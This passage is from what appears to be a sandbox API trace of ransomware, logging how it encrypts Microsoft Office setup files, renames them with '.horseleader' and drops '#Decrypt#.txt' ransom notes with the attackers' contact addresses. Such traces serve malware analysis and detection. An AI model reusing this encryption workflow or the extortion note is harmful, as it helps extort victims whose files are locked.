(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.838] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.838] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.838] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 108 [0244.838] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.838] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=5884) returned 1 [0244.839] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x16fc, lpOverlapped=0x0) returned 1 [0244.841] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.841] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x16fc, lpOverlapped=0x0) returned 1 [0244.841] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.841] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.842] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.842] CloseHandle (hObject=0x15c) returned 1 [0244.842] GetProcessHeap () returned 0x780000 [0244.842] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.842] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.horseleader") returned 120 [0244.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.horseleader")) returned 1 [0244.843] GetProcessHeap () returned 0x780000 [0244.843] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.843] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58c6830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.843] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.843] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\#Decrypt#.txt") returned 112 [0244.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.846] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.846] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.847] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.847] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.847] CloseHandle (hObject=0x1a4) returned 1 [0244.847] GetProcessHeap () returned 0x780000 [0244.847] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.847] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="PROPLUSR", cAlternateFileName="")) returned 1 [0244.847] lstrcmpiW (lpString1="PROPLUSR", lpString2="Windows") returned -1 [0244.847] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR") returned 92 [0244.847] lstrcmpW (lpString1="PROPLUSR", lpString2=".") returned 1 [0244.847] lstrcmpW (lpString1="PROPLUSR", lpString2="..") returned 1 [0244.848] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.848] GetProcessHeap () returned 0x780000 [0244.848] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.848] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*") returned 94 [0244.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.855] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.855] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\.") returned 94 [0244.855] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.855] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.855] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.855] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\..") returned 95 [0244.855] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.855] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.855] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x170fe40, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="ProPlusrWW.XML", cAlternateFileName="PROPLU~1.XML")) returned 1 [0244.855] lstrcmpiW (lpString1="ProPlusrWW.XML", lpString2="Windows") returned -1 [0244.855] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 107 [0244.855] StrStrIW (lpFirst="ProPlusrWW.XML", lpSrch=".horseleader") returned 0x0 [0244.856] lstrcmpW (lpString1="ProPlusrWW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.856] lstrcmpW (lpString1="ProPlusrWW.XML", lpString2="_uninstalling_.png") returned 1 [0244.856] lstrlenW (lpString=".testttjffg") returned 11 [0244.856] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML", lpSrch=".testttjffg") returned 0x0 [0244.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.857] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 107 [0244.857] StrStrW (lpFirst="ProPlusrWW.XML", lpSrch=".txt") returned 0x0 [0244.857] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=16852) returned 1 [0244.857] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x41d4, lpOverlapped=0x0) returned 1 [0244.860] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.860] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x41d4, lpOverlapped=0x0) returned 1 [0244.860] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.860] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.860] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.861] CloseHandle (hObject=0x15c) returned 1 [0244.861] GetProcessHeap () returned 0x780000 [0244.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.861] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.horseleader") returned 119 [0244.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.horseleader")) returned 1 [0244.862] GetProcessHeap () returned 0x780000 [0244.862] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.862] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18177c50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.862] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.862] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 102 [0244.862] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.863] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.863] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.863] lstrlenW (lpString=".testttjffg") returned 11 [0244.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 102 [0244.863] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.864] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=31094) returned 1 [0244.864] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.869] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.869] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.870] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2976, lpOverlapped=0x0) returned 1 [0244.872] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.872] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2976, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2976, lpOverlapped=0x0) returned 1 [0244.872] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.872] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.873] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.873] CloseHandle (hObject=0x15c) returned 1 [0244.873] GetProcessHeap () returned 0x780000 [0244.873] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.873] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.horseleader") returned 114 [0244.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.horseleader")) returned 1 [0244.874] GetProcessHeap () returned 0x780000 [0244.874] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.874] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18177c50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.874] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.874] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\#Decrypt#.txt") returned 106 [0244.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.877] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.877] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.878] lstrlenA 